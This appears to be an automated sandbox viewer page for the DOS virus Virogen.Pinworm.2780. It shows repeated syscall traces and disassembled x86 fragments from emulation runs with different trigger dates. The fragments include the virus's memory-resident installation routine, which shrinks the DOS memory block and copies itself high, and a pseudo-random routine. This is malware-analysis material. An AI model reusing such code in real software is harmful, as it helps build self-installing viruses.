Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2780

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:28.682573539Z 250 PC: 12fba | UNKNOWN!
2018-12-17T22:19:28.683989765Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd
0x12fc5: jne 0x12fcd
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax
0x12fd2: cmp byte ptr [0], 0x5a
0x12fd7: jne 0x1301e
0x12fd9: sub word ptr [3], 0x180
0x12fdf: sub word ptr [0x12], 0x180
0x12fe5: mov es, word ptr [0x12]
0x12fe9: push cs
0x12fea: pop ds
0x12feb: mov si, bp
0x12fed: mov cx, 0x4fc
0x12ff0: xor di, di
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax
0x12ff8: push ds
2018-12-17T22:19:28.687641855Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx
0x13479: pop ax
0x1347a: ret
0x1347b: push ax
0x1347c: mov ax, word ptr [0x8d6]
0x1347f: mov cx, 0x7ab5
0x13482: mul cx
0x13484: add ax, 0x3619
0x13487: mov word ptr [0x8d6], ax
0x1348a: pop cx
0x1348b: mul cx
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx
0x13493: ret
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3359,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:58.504695628Z 250 PC: 12fba | UNKNOWN!
2018-12-25T11:48:58.506027614Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd
0x12fc5: jne 0x12fcd
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax
0x12fd2: cmp byte ptr [0], 0x5a
0x12fd7: jne 0x1301e
0x12fd9: sub word ptr [3], 0x180
0x12fdf: sub word ptr [0x12], 0x180
0x12fe5: mov es, word ptr [0x12]
0x12fe9: push cs
0x12fea: pop ds
0x12feb: mov si, bp
0x12fed: mov cx, 0x4fc
0x12ff0: xor di, di
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax
0x12ff8: push ds
2018-12-25T11:48:58.508185422Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx
0x13479: pop ax
0x1347a: ret
0x1347b: push ax
0x1347c: mov ax, word ptr [0x8d6]
0x1347f: mov cx, 0x7ab5
0x13482: mul cx
0x13484: add ax, 0x3619
0x13487: mov word ptr [0x8d6], ax
0x1348a: pop cx
0x1348b: mul cx
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx
0x13493: ret
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3359,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:58.617271299Z 250 PC: 12fba | UNKNOWN!
2018-12-25T11:48:58.619182414Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd
0x12fc5: jne 0x12fcd
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax
0x12fd2: cmp byte ptr [0], 0x5a
0x12fd7: jne 0x1301e
0x12fd9: sub word ptr [3], 0x180
0x12fdf: sub word ptr [0x12], 0x180
0x12fe5: mov es, word ptr [0x12]
0x12fe9: push cs
0x12fea: pop ds
0x12feb: mov si, bp
0x12fed: mov cx, 0x4fc
0x12ff0: xor di, di
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax
0x12ff8: push ds
2018-12-25T11:48:58.621622603Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx
0x13479: pop ax
0x1347a: ret
0x1347b: push ax
0x1347c: mov ax, word ptr [0x8d6]
0x1347f: mov cx, 0x7ab5
0x13482: mul cx
0x13484: add ax, 0x3619
0x13487: mov word ptr [0x8d6], ax
0x1348a: pop cx
0x1348b: mul cx
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx
0x13493: ret
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx